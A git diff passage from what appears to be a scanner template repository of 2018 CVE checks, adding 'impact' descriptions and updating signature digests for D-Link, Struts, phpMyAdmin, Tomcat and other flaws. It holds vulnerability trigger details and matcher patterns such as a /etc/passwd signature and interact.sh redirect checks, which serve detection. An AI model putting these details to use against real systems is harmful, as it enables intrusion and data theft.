   description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the target system
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the vulnerability
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022016e21de8891884039976f212b03fddf625f22f5849c49b92faa6a4c0defb8e58022100889f2b8febb3e6346805854a50ad4f1cba7ed6e822ed772afa4d04667f34931a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cbf8e303e514337053ef047c67628404dc7c3c0e4d2c92e62f0454ef93e7db5c022013d61bf969a523c7fb763697cec3ce22aea57c1db022f1cba322bec8f6c55bff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml
index 830fda1175..1b179af403 100644
--- a/http/cves/2018/CVE-2018-10823.yaml
+++ b/http/cves/2018/CVE-2018-10823.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f7626106e52e692d05839d60506ecc8fbee523119362ef04ee0459746ede18910221008cca14c064568d57a64ddf9728181d4d550d8559771c3d60930bf35a3d63bf98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ce33a79e6b3d3401c0e63540242834659be6ef9047431d15c88c4fbec40939dd022019045ce46747021f90a207e75119bdbf1d6cb67b21f94602bfb46baca209264b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml
index 379703c0d6..70d8dba8fd 100644
--- a/http/cves/2018/CVE-2018-10956.yaml
+++ b/http/cves/2018/CVE-2018-10956.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
   remediation: |
     Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008146320c55fa68651e5aad1e2a70a1c2eddd0cd8957c77b45f43b84c36fccdf1022100955e30ae17c92921153cfe5db79eef7ec23b971db2c318f5db07d46c40ed937e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d9d5fbbae10553167d9c415cb92a7db1bfc91846fe52114f108dff19dc0c0bc0022052ab683639adb114492fa4627a69ea313a36af905641a6805e29a7ff1563e57f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml
index c83235e263..b182bc4d44 100644
--- a/http/cves/2018/CVE-2018-11227.yaml
+++ b/http/cves/2018/CVE-2018-11227.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php.  An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022011bd40cba707c618ccceff97ebb516dcb49ddf287ded3cb0c97ed0e0eb4dd819022100ad4d9f3c1480bfa52ec075a59cf11961f039e7ec78075db37e322635e891f8a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100853f9c6cfb12519c82a81347f3874fd3d2952e11fe632f0d503a7354cea22c21022061ccde204264de75fcef0b0c3c2a15d78a3d77008479064f2347391838144f87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml
index 9a7337c1a1..e6dfd5dc1f 100644
--- a/http/cves/2018/CVE-2018-11231.yaml
+++ b/http/cves/2018/CVE-2018-11231.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     OpenCart Divido plugin is susceptible to SQL injection
+  impact: |
+    This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.
   remediation: |
     Apply the official patch or upgrade to a version that includes the fix.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b7e2ef4c9724c30e475ad707fa73be68bbe98ab1bd57af857d7598731d654561022024abad990f2abc1545ec2941390f785dcfb3f2aad88e247eacac3df32fef0910:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220672fc02832aaf8d667e4a0858125dc6dea65e34b9b488b610c561ef47efa147f022100d675f5c2b812729f574e501dddc8e85db1a855c093583424954a41e193beecec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml
index aa93c6b988..3c752fbbc9 100644
--- a/http/cves/2018/CVE-2018-11409.yaml
+++ b/http/cves/2018/CVE-2018-11409.yaml
@@ -5,6 +5,8 @@ info:
   author: harshbothra_
   severity: medium
   description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   remediation: |
     Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201ec6b421be7bf09f279bfabce323c1ec7481d82e7df904a9aec4ba6bcba6701e02207a75e01e45c4676891ac968de6365364e8d169ff2f4c42a333113c034f18ee58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008e9fb72789459ca8d438abf1a5e5848290577c6b5972411a769c05450658ae07022100c08b4dafb07b0d2a4b8ff5f164d97c91f5d93b982177b9e3a1931dca26dafbd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml
index 4ec649fa85..17df84a490 100644
--- a/http/cves/2018/CVE-2018-11473.yaml
+++ b/http/cves/2018/CVE-2018-11473.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
           - 'id="csrf" name="csrf" value="(.*)">'
         internal: true
         part: body
-# digest: 4a0a00473045022100f8976d7f70d7c1c1aa552f6551ddd2193d6da6de168306be10b5053c3968197802202f02653b79cd0a46ea1def9f3344755df764a6de25b5d1103485c74d752f9bc9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022023418b0bd7c765e159c81014598a5f5dad1a34b3183959586c9a8f775938900e022100ddb473087dac58cd50f8472054cd2caba81c7ab4fbbbad4493b07b6bd7ae6012:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml
index 8afa6d59b3..5e23de622d 100644
--- a/http/cves/2018/CVE-2018-11709.yaml
+++ b/http/cves/2018/CVE-2018-11709.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009bbd3c2aafb10647905b4e730bbb4707396ee83609782bff3f647d339d6d1d7f02207bbc83ba0c6622ad13d1a4a218cbdbc82218236d1354e49a77afcbeacaabf7ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204c4f46cce9a1097999590e680c289a0c7e821fc0ccf2802777d3f355f69631ab022100e2fae5013b327f7fa3d04cc696b27c0194f2f9c03e38e58fb99f6b34e6704498:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml
index dea1f2b3cf..08255b6ab6 100644
--- a/http/cves/2018/CVE-2018-11759.yaml
+++ b/http/cves/2018/CVE-2018-11759.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
+  impact: |
+    Unauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server.
   remediation: |
     Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220356ae1b181e96cf9ac615854c3cd5b0d71eb7f3dbc1a27640bd67305e644d773022100c14791ac06843bcbd22caf2bd6fa417037f22f3030e78439b3485b0be2a483d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203cac2fe2d0ab4b4036d3e444a16be43374645739fa2015c61e060ec92dbf052802201f4d9caab87009b9e0dcdf31bd4bda4b25205bd3f9a42818781d5c8aef371a91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml
index 1dc426628b..c2bff933dd 100644
--- a/http/cves/2018/CVE-2018-11776.yaml
+++ b/http/cves/2018/CVE-2018-11776.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ecaf52487851b3a32f8a3a12f0f317f3a393af49a5ac758d919f0ec64986768f0221009202f62d6b5253d9f129895440dc14099b34b78a3a436d1cf4ab732dc1c0a7e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f45b973add47b6e3076816297a08941c85f7bb4d9ba71632b7db58f94e2f64c802206c151edf1356d0784f6903749a16ed853e73fa323100e602763a0f372467a8fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml
index 7eaf07a9d2..eaaa87a95e 100644
--- a/http/cves/2018/CVE-2018-11784.yaml
+++ b/http/cves/2018/CVE-2018-11784.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.
+  impact: |
+    An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation.
   reference:
@@ -45,4 +47,4 @@ http:
         negative: true
         status:
           - 404
-# digest: 4b0a00483046022100c198269185294812649aec4d11d42494a012408aeb4f6b2abd59151ce7d0727d022100dc472e978f57e82522587a836c75bc866c8046e87959a2935c81ba4f9f06e563:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201f4393ed8f2fe20c4fd54f9616971e59357da8ef6ed5f1a16e5b354857de04d402202eaaa8e31d0f9f179bee3e1427e192ea6f0c5acbc67849263611effa8fe9c4cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml
index f5652a1e5f..f41b076bb3 100644
--- a/http/cves/2018/CVE-2018-12031.yaml
+++ b/http/cves/2018/CVE-2018-12031.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c31f40454ca7102e23152f4d70414136b95ad9c8c175ff4df1c876b5a6fde493022100b61d3b864d34763054d252e4d8bb9b29311061ae9b2b6195f33e9df6cb9a27d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200c568082d57463015a72c0ac3d5597c5799adb4b265412913c026d4f0b1e170f022073cd9359256b3a6d7d44863f0ee1096c922eccd59e7bb32ff2b6919d5201f415:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml
index 97a7b407c4..2ac3902371 100644
--- a/http/cves/2018/CVE-2018-12054.yaml
+++ b/http/cves/2018/CVE-2018-12054.yaml
@@ -5,6 +5,8 @@ info:
   author: wisnupramoedya
   severity: high
   description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022064a95903712a34a383c4634be61f999b94e0134ac32eba40ebb21aa098f97240022100c299bf424914b10d2ace2c040a529eb76214720b62d4327e67f5a3a0e53085e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022079925b2c8857f3bb3c1cce640e60688393ebc60e04262285b9d24cbdf74dd759022100db052a9649054c760bac709de0e3da56fad43afbf316e2320e4e15499eb87874:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml
index a39cd6259e..57c97ce58e 100644
--- a/http/cves/2018/CVE-2018-1207.yaml
+++ b/http/cves/2018/CVE-2018-1207.yaml
@@ -8,6 +8,8 @@ info:
     Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability
     which could be used to execute remote code. A remote unauthenticated attacker may
     potentially be able to use CGI variables to execute remote code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware updates provided by Dell to mitigate this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: response
         words:
           - "calling init: /lib/"
-# digest: 4b0a004830460221009ab4463c0cf7898d889cebb97230cdf8e026e44d849f8d95dbc2a52d8a302a06022100aed203db27dc69f5d96f206c7c1db20020ff365c4cef08fc78c7acc480e0fe5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cdc2713773363d8045519f2ee5ad1fc4363f3c539ea66a96ec4d9c62f84b827e0221008229950b33559b0ebc4637536d2243365bd216d52026213fd976ae2463db841e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml
index 3bd7b7380a..07a2417384 100644
--- a/http/cves/2018/CVE-2018-12095.yaml
+++ b/http/cves/2018/CVE-2018-12095.yaml
@@ -5,6 +5,8 @@ info:
   author: LogicalHunter
   severity: medium
   description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008559698d72502995f5f2d8db5091ab204423b4ae2c4144bab327501682e4668002205472eeb66ea4d2bf3ed42f342d48083e99fb92f54c1f87507b4c303119a83d56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022075be208a307205c853110c33fd7341734b6d40f9269ce8189d387ebc40a9baaf02201dea139339978ec040a1c04e8f5e2c7a726b6e8bde414f5b4cdbf6d6a2e88ae5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml
index 4eaca1279e..48f1392013 100644
--- a/http/cves/2018/CVE-2018-12296.yaml
+++ b/http/cves/2018/CVE-2018-12296.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: high
   description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.
+  impact: |
+    An attacker can gain sensitive information about the server, potentially leading to further attacks.
   remediation: |
     Upgrade to a patched version of Seagate NAS OS.
   reference:
@@ -45,4 +47,4 @@ http:
         regex:
           - '"version": "([0-9.]+)"'
         part: body
-# digest: 4a0a0047304502210099133e0a1103fa78df6a8ed5b8ad14c025c6db6be209ac8986d22e0da32cd3f4022050fc3d2624787f4a2d8c3875cf0eca8d367824e0f3ee051168c72adce67508dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210088c34461d85bffb165c308034533866bd7eee6e6163d58b39046c076002f3b9302206e0a4ba175fb723e39796f8311ab738341de9e92387dc4222f386f13919274d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml
index c5a197cfad..961af41ca2 100644
--- a/http/cves/2018/CVE-2018-12300.yaml
+++ b/http/cves/2018/CVE-2018-12300.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.
+  impact: |
+    Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware.
   remediation: |
     Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1.
   reference:
@@ -34,4 +36,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502203fc07d00611d13090ff372c8868135d3915079d0c8cf7a3640e83e6865c7bece022100a0cc57baadd20aa924a7275f40a996e810d452c8f7a7134c12db9c8d8d5bd3de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202c4d01625343e65e244bd0213b48c9a0ba194cab7aaed23d0116310c260a2908022100814be48649c8b8b57de19a3812207b9e5a8213058dd0606bb8acb0c4a398137c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml
index 9e1a85c94d..966099b72f 100644
--- a/http/cves/2018/CVE-2018-12613.yaml
+++ b/http/cves/2018/CVE-2018-12613.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: |
     Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d8be22d57997125efb7788431962c99efee8c3467907cf03e308c69582a3719b022100c37b69c80c31705d85ed2a02695d28b2406a65ecac8d0546359df04e388fda07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e82db79b01411365294e1064bb99286ad38506c0360beace48c376afb76e2a50022044b656574a2e6467ede70477d7e91d8a63ed3f335cd8c133436ca98f4b127d5b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml
index 52d3c762eb..23d3d66ae1 100644
--- a/http/cves/2018/CVE-2018-12634.yaml
+++ b/http/cves/2018/CVE-2018-12634.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.
+  impact: |
+    An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cb884b9064727c42b1f086ad7d11ff2df5809439cbe2b7f57a8a2088722bb32c022100c36a55ce8eb12e853bdd2d2b72cd866515acdfcdbcd582b4a4f17e6dcef4e09f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206478c6dbec451155ed0308a4ae148ba881af0c7b1b46ef63551f46dda83c2c710221009a44c42737796faeaf56ea11f0940ddd6217af486def2b5b042f8b589e7f15fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml
index 70f82f6466..56f94483c3 100644
--- a/http/cves/2018/CVE-2018-12675.yaml
+++ b/http/cves/2018/CVE-2018-12675.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: body
         words:
           - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
-# digest: 4b0a00483046022100a1781ce85f3abc1318969c1480b980aa165bbfda3308e12cc7b804f29da3488002210087c749ecf233c3ad8989782936e586241256fa81fd5c37826d8ebbc74e1beb92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220259ce09b98d9d5e11104831565de1695869962725c611a4de2aa00a3e2c8d4cb022100ea6707597fa386d381f2ab3e939a3e9516457cfacc86e637fdc11280279cb04d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml
index 04ba9452ad..a7bfc04969 100644
--- a/http/cves/2018/CVE-2018-1271.yaml
+++ b/http/cves/2018/CVE-2018-1271.yaml
@@ -5,6 +5,8 @@ info:
   author: hetroublemakr
   severity: medium
   description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ffa51f20ec96c2e7941833eb20f0577e8d1637998fdc44b37fd9ef92340868b5022100aec08ff027670294c3dfc30cad92f7c570ce932903213012333f05ff3df03753:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210088b3514173bab2d2d9e78e2e2ade11c914ff4e81ba7666a3fbef88e8436ff7f902200d766541f08f927ee5b7063eb539eeb9875e767f8b7dcdb10b301e672ff77584:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml
index 28ca68907e..8470dadd4b 100644
--- a/http/cves/2018/CVE-2018-1273.yaml
+++ b/http/cves/2018/CVE-2018-1273.yaml
@@ -11,6 +11,8 @@ info:
     An unauthenticated remote malicious user (or attacker) can supply
     specially crafted request parameters against Spring Data REST backed HTTP resources
     or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
           - "root:.*:0:0:"
           - "\\[(font|extension|file)s\\]"
         condition: or
-# digest: 490a004630440220559c83e68898e628b3c266802f69ab1049aa08c2f270a9ad464e23af28f0e0ae022027b2b9868b55b3540b68ef253a404e37d036df2c5434ecea6b74772fb5c4bd7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220699a47b0d24976d01b1760fd164fd5b8c6105c9a3ff09d1f43d560b184b3ea940220287897b643d3538f1ca3824daadc3a5c96be99c456069ed622edbe69c409708b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml
index 6008395783..c90ae4e311 100644
--- a/http/cves/2018/CVE-2018-12998.yaml
+++ b/http/cves/2018/CVE-2018-12998.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts  Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100861ac032a60b2dd757f2c02b8c8ef6c4977a96e0f6634e687478bf8bf2b30885022100f351810fdb8584cecffbfbde0aed8f9c7cd6c24831d3722d0ffde984ce38b0db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220111fe9d6e03a68b2a8a4b78b2f8e92000c7a040ac44b63f00a3ff899b56986bb0221008bca6dba56fafce19541133bdd4b5cd06f8d3543b4b82d3b53b2ceccbb980b36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
